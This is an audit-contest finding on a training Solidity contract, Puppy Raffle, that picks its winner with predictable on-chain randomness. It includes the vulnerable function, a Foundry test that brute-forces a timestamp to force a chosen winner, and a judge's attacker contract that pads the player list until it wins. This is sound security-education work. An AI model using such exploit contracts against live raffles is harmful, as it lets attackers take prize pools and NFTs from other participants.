Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Predictable & Manipulable Winner Selection via On-Chain Randomness

cryptostellar5

Root + Impact

Description

The raffle winner is selected using fully predictable and attacker-controlled inputs:

  • msg.sender → controlled by attacker

  • block.timestamp → miner / validator controlled

  • block.difficulty → predictable / manipulable (and deprecated on PoS)

An attacker can deterministically force the winner index by:

  • Choosing the caller address

  • Choosing when to call selectWinner()

  • Replaying the computation off-chain before sending the transaction

This allows guaranteed wins and unfair manipulation of raffle outcomes.

function selectWinner() external { //@audit winner can be address0
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
@> uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];
uint256 totalAmountCollected = players.length * entranceFee;
uint256 prizePool = (totalAmountCollected * 80) / 100;
uint256 fee = (totalAmountCollected * 20) / 100;
totalFees = totalFees + uint64(fee);
uint256 tokenId = totalSupply();
// We use a different RNG calculate from the winnerIndex to determine rarity
uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;
if (rarity <= COMMON_RARITY) {
tokenIdToRarity[tokenId] = COMMON_RARITY;
} else if (rarity <= COMMON_RARITY + RARE_RARITY) {
tokenIdToRarity[tokenId] = RARE_RARITY;
} else {
tokenIdToRarity[tokenId] = LEGENDARY_RARITY;
}
delete players;
raffleStartTime = block.timestamp;
previousWinner = winner;
(bool success,) = winner.call{value: prizePool}("");
require(success, "PuppyRaffle: Failed to send prize pool to winner");
_safeMint(winner, tokenId);
}

Risk

Likelihood:

  • Requires no special permissions

Can be executed by any participant

  • Computation is trivial off-chain

Impact:

  • Attacker can force themselves to win

  • Raffle fairness is completely broken

  • NFT rarity farming possible

  • Economic manipulation of prize distribution

This defeats the core purpose of the protocol.

Proof of Concept

The following POC demonstrates that the attacker can ensure that the desired player index wins

function testForceWinnerIndexWithLogs() public playersEntered {
uint256 desiredIndex = 2; // we want playerThree to win
address attacker = playerThree;
uint256 timestamp = block.timestamp + duration + 1;
uint256 difficulty = block.difficulty;
uint256 playersLen = 4;
console.log("Desired winner index:", desiredIndex);
console.log("Attacker address:", attacker);
console.log("Players length:", playersLen);
// Brute-force timestamp until we get the desired index
while (true) {
uint256 computedIndex =
uint256(
keccak256(
abi.encodePacked(
attacker,
timestamp,
difficulty
)
)
) % playersLen;
if (computedIndex == desiredIndex) {
console.log("Found winning timestamp:", timestamp);
console.log("Computed winner index:", computedIndex);
break;
}
timestamp++;
}
// Warp chain state to the attacker-controlled winning state
vm.warp(timestamp);
vm.roll(block.number + 1);
console.log("Calling selectWinner at timestamp:", block.timestamp);
// Attacker calls selectWinner
vm.prank(attacker);
puppyRaffle.selectWinner();
console.log("Previous winner recorded:", puppyRaffle.previousWinner());
// Deterministic win
assertEq(puppyRaffle.previousWinner(), attacker);
}

Recommended Mitigation

Use Chainlink VRF, it ensures:

  • True randomness

Verifiable

  • Industry standard

- keccak256(msg.sender, block.timestamp, block.difficulty)
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!